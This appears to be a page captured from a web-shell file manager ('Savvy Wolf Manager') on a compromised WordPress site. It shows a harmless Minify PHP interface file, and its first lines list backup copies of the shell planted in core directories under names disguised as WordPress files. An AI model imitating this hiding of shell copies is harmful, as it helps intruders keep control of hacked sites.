Backups Created:
/home/teltatz/public_html/wp-admin/admin-wolf.php
/home/teltatz/public_html/wp-content/edit-wolf.php
/home/teltatz/public_html/wp-includes/widgets/class-wp-wolf-widget.php
Savvy
W
olf -
MANAGER
Edit File: ControllerInterface.php
<?php interface Minify_ControllerInterface { /** * Create controller sources and options for Minify::serve() * * @param array $options controller and Minify options * * @return Minify_ServeConfiguration */ public function createConfiguration(array $options); /** * Get the Env component * * @return Minify_Env */ public function getEnv(); }